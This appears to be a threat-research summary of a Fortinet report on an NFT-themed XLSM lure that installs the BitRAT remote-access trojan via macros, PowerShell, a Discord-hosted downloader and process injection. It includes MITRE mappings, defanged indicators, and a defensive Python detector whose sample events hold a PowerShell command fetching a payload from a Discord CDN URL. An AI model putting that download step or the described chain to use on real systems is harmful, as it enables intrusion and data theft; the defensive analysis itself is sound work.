FortiGuard Labs details an NFT-themed lure that hides a BitRAT infection in an Excel XLSM file, downloaded via Discord and executed through a malicious macro. The malware chain includes batch and PowerShell steps, a .NET downloader, DLL injection, persistence, and a BitRAT payload with HVNC capabilities and multiple data-theft functions. #BitRAT #HVNC #FranTechSolutions #NFT #Discord
Keypoints
- The XLSM file is named “NFT_Items.xlsm” and contains a Hebrew workbook with NFT-related content, likely targeting NFT enthusiasts in Israel to entice downloads.
- A malicious Excel macro drops a batch file and uses PowerShell to fetch NFTEXE.exe from Discord.
- NFTEXE.exe is a .NET payload that persists, injects into MSBuild.exe via a DLL, and downloads NFTEXE.png (data with reversed strings) from Discord.
- The final payload is BitRAT, a RAT with HVNC, UAC and Windows Defender bypass, screen and webcam monitoring, and other capabilities.
- BitRAT can run Slowloris for DDoS, and its C2 infrastructure is hosted by a bulletproof provider (FranTech Solutions).
- Fortinet identifies the threat with file-hash and network indicators and provides defenses such as FortiGuard Antivirus/EDR detections and WebFiltering IOCs.
- BitRAT can steal browser/app credentials, mine Monero, log keystrokes, transfer files, and capture microphone input; it also stores data in ADS and rotates logs daily.
MITRE Techniques
- [T1059.005] Visual Basic – The XLSM contains a malicious macro, which the user is asked to enable upon opening the file. “The XLSM contains a malicious macro, which the user is asked to enable upon opening the file.”
- [T1059.001] PowerShell – It then uses a PowerShell script to download another file from Discord, NFTEXE.exe. “It then uses a PowerShell script to download another file from Discord, NFTEXE.exe.”
- [T1105] Ingress Tool Transfer – The PowerShell step downloads NFTEXE.exe from Discord. “download another file from Discord, NFTEXE.exe.”
- [T1027] Obfuscated/Compressed Files and Information – NFTEXE.png is pure data with all its strings flipped. “NFTEXE.png is pure data with all its strings flipped (see Figure 5).”
- [T1055] Process Injection – NFTEXE.exe injects a malicious payload into MSBuild.exe using Nnkngxzwxiuztittiqgz.dll. “injects a malicious payload into the running MSBuild.exe using Nnkngxzwxiuztittiqgz.dll.”
- [T1547.001] Boot or Logon Autostart Execution – NFTEXE.exe copies itself to startup and runs at every boot. “copies itself as C:\Users\[username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AdobeCloud.exe, which runs at every startup.”
- [T1548.002] UAC Bypass – The sample can bypass User Account Control. “bypass User Account Control (UAC)—a Windows security feature…”
- [T1562.001] Impair Defenses – It can bypass Windows Defender. “and Windows Defender—an anti-malware component…”
- [T1555] Credentials from Password Stores – Stealing credentials from browsers and applications installed on the machine. “Stealing credentials from browsers and applications installed on the compromised machine.”
- [T1496] Resource Hijacking – Mining Monero cryptocurrency. “Mining Monero cryptocurrency.”
- [T1056.001] Keylogging – Logging keystrokes. “Logging keystrokes.”
- [T1499] Endpoint Denial of Service – Slowloris used for DDoS. “Running Slowloris for its DDoS capabilities.”
- [T1583] Acquire Infrastructure – C2 hosted at FranTech Solutions (bulletproof hosting). “The C2 server… belongs to FranTech Solutions, a hosting provider that is known as a bulletproof hosting service provider.”
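Detection-side example added here (not code from the Fortinet report): it scores constructed process-creation events against the chain mapped above, so a practitioner can see which stages leave a process-tree footprint. The process names, the Start Menu path pattern, the sample events and the assumption that MSBuild.exe is normally launched only by build tools are my own heuristics, not indicators from the report.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    parent: str   # parent process image path
    image: str    # new process image path
    cmdline: str  # full command line

# Heuristics keyed to the stages the report describes; names, paths and sample
# events are constructed for this example, not taken from real telemetry.
OFFICE = ("excel.exe", "winword.exe", "powerpnt.exe")
SHELLS = ("cmd.exe", "powershell.exe", "pwsh.exe")
BUILD_PARENTS = ("devenv.exe", "msbuild.exe", "dotnet.exe")  # assumed benign launchers
DISCORD_CDN = re.compile(r"cdn\.discordapp\.com/attachments/", re.I)
STARTMENU_EXE = re.compile(r"\\Start Menu\\Programs\\[^\\]+\.exe$", re.I)

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(ev: ProcEvent) -> list:
    """Return the technique tags this one event matches ([] if nothing fires)."""
    tags, p, i = [], basename(ev.parent), basename(ev.image)
    if p in OFFICE and i in SHELLS:
        tags.append("T1059: Office app spawned a shell")
    if i in ("powershell.exe", "pwsh.exe") and DISCORD_CDN.search(ev.cmdline):
        tags.append("T1105: PowerShell fetching from Discord CDN")
    if i == "msbuild.exe" and p not in BUILD_PARENTS:
        tags.append("T1055: MSBuild.exe launched by a non-build parent")
    if STARTMENU_EXE.search(ev.image):
        tags.append("T1547.001: executable run from Start Menu\\Programs")
    return tags

def scan(events):
    return [(ev.image, classify(ev)) for ev in events if classify(ev)]

SAMPLE_EVENTS = [  # constructed process-creation events mirroring the report's chain
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
              r"C:\Windows\System32\cmd.exe", r"cmd.exe /c %TEMP%\run.bat"),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -c "iwr https://cdn.discordapp.com/attachments/<id>/<id>/NFTEXE.EXE"'),
    ProcEvent(r"C:\Users\alice\Downloads\NFTEXE.exe",
              r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe", "MSBuild.exe"),
    ProcEvent(r"C:\Program Files\Microsoft Visual Studio\devenv.exe",
              r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe", "MSBuild.exe proj.csproj"),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AdobeCloud.exe",
              "AdobeCloud.exe"),
]
```

The fourth event (devenv.exe launching MSBuild.exe) is included as a benign control so the MSBuild heuristic does not fire on ordinary developer activity.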
Indicators of Compromise
- [SHA-256] Sample hashes – 88ef347ad571f74cf1a450d5dad85a097bb29ab9b416357501cdc4c00388f796, 342a5102bc7eedb62d5192f7142ccc7413dc825a3703e818cf32094638ebd17a
- [Network] URLs – hxxps://cdn[.]discordapp.com/attachments/923977279179202600/927289948825079828/NFT_LIST.xlsm, hxxps://cdn[.]discordapp.com/attachments/927290851930013766/927291495604699167/NFT_LIST.xlsm, hxxps://cdn[.]discordapp.com/attachments/923858595353874472/928279600659234826/NFTEXE.EXE
- [Network] IP – 205[.]185[.]118[.]52
Read more: https://www.fortinet.com/blog/threat-research/nft-lure-used-to-distribute-bitrat